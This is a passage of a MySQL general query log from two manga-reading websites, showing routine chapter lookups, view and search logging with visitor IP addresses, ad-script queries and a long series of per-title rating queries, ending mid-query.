Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659950 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6611' and m.active = 1 330659950 Quit 330659951 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659951 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('134', '6611', '66.249.79.139', 'mangaberri.com', '2026-02-26 03:30:07', '2026-02-26 03:30:07') 330659951 Quit 330659952 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659952 Query select * FROM chapter_images where chapter_id = '6611' 330659952 Quit 330659953 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659953 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '134' and m.active = 1 330659953 Quit 330659954 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659954 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='134' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Romance%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330659954 Quit 330659955 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659956 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659955 Quit 330659956 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659956 Quit 330659957 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659958 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659957 Quit 330659958 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659958 Quit 330659959 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659960 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659959 Quit 330659960 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659960 Quit 330659961 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659962 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659962 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659961 Quit 330659962 Quit 330659963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659963 Quit 330659964 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14147' 330659964 Quit 330659965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659965 Query select * FROM chapters where id = '14147' 330659965 Quit 330659966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659966 Query select * FROM chapters where manga_id = '225' order by id desc 330659966 Quit 330659967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659967 Query Update chapters set view=view+1 where id = '14147' 330659967 Quit 330659968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659968 Query select * FROM chapters where id = '14147' 330659968 Quit 330659969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659969 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14147' 330659969 Quit 330659970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659970 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('225', '14147', '1.52.111.39', 'mangacherri.com', '2026-02-26 03:30:07', '2026-02-26 03:30:07') 330659970 Quit 330659971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659971 Query select * FROM chapter_images where chapter_id = '14147' 330659971 Quit 330659972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659972 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '225' and m.active = 1 330659972 Quit 330659973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659973 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='225' and m.active = 1 AND (genres like '%Josei%' OR genres like '%Romance%') ORDER BY RAND() limit 10 330659974 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659975 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659974 Quit 330659975 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659975 Quit 260225 19:30:08 330659973 Quit 330659976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659977 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659976 Quit 330659977 Quit 330659978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659978 Quit 330659979 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659979 Quit 330659980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659980 Quit 330659981 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659981 Quit 330659982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659982 Quit 330659983 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659983 Quit 330659984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659984 Quit 330659985 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('A sign of affection', '2a02:2788:39:fb2f:2079:67cc:a863:aafe', '2026-02-26 03:30:08') 330659985 Quit 330659986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659986 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%A sign of affection%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%A sign of affection%' ) ) 330659986 Quit 330659987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659987 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'A sign of affection ' 330659987 Quit 330659988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659988 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330659988 Quit 330659989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659989 Quit 330659990 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659990 Quit 330659991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330659991 Quit 330659992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330659992 Quit 330659993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330659993 Quit 330659994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330659994 Quit 330659995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330659995 Quit 330659996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330659996 Quit 330659997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330659997 Quit 330659998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330659998 Quit 330659999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330659999 Quit 330660000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330660000 Quit 330660001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330660001 Quit 330660002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330660002 Quit 330660003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330660003 Quit 330660004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330660004 Quit 330660005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330660005 Quit 330660006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330660006 Quit 330660007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330660007 Quit 330660008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330660008 Quit 330660009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330660009 Quit 330660010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330660010 Quit 330660011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330660011 Quit 330660012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330660012 Quit 330660013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330660013 Quit 330660014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330660014 Quit 330660015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330660015 Quit 330660016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330660016 Quit 330660017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330660017 Quit 330660018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330660018 Quit 330660019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330660019 Quit 330660020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330660020 Quit 330660021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330660021 Quit 330660022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330660022 Quit 330660023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330660023 Quit 330660024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330660024 Quit 330660025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330660025 Quit 330660026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330660026 Quit 330660027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330660027 Quit 330660028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330660028 Quit 330660029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330660029 Quit 330660030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330660030 Quit 330660031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330660031 Quit 330660032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330660032 Quit 330660033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330660033 Quit 330660034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330660034 Quit 330660035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330660035 Quit 330660036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330660036 Quit 330660037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330660037 Quit 330660038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330660038 Quit 330660039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330660039 Quit 330660040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330660040 Quit 330660041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330660041 Quit 330660042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330660042 Quit 330660043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330660043 Quit 330660044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330660044 Quit 330660045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330660045 Quit 330660046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330660046 Quit 330660047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330660047 Quit 330660048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330660048 Quit 330660049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330660049 Quit 330660050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330660050 Quit 330660051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330660051 Quit 330660052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330660052 Quit 330660053 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660053 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330660053 Quit 330660054 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660054 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330660054 Quit 330660055 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660055 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330660055 Quit 330660056 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330660056 Quit 330660057 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330660057 Quit 330660058 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330660058 Quit 330660059 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330660059 Quit 330660060 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330660060 Quit 330660061 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330660061 Quit 330660062 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330660062 Quit 330660063 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330660063 Quit 330660064 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330660064 Quit 330660065 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330660065 Quit 330660066 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330660066 Quit 330660067 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330660067 Quit 330660068 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330660068 Quit 330660069 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330660069 Quit 330660070 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330660070 Quit 330660071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330660071 Quit 330660072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330660072 Quit 330660073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330660073 Quit 330660074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330660074 Quit 330660075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330660075 Quit 330660076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330660076 Quit 330660077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330660077 Quit 330660078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330660078 Quit 330660079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330660079 Quit 330660080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330660080 Quit 330660081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330660081 Quit 330660082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330660082 Quit 330660083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330660083 Quit 330660084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330660084 Quit 330660085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330660085 Quit 330660086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330660086 Quit 330660087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330660087 Quit 330660088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330660088 Quit 330660089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330660089 Quit 330660090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330660090 Quit 330660091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330660091 Quit 330660092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330660092 Quit 330660093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330660093 Quit 330660094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330660094 Quit 330660095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330660095 Quit 330660096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330660096 Quit 330660097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330660097 Quit 330660098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330660098 Quit 330660099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330660099 Quit 330660100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where 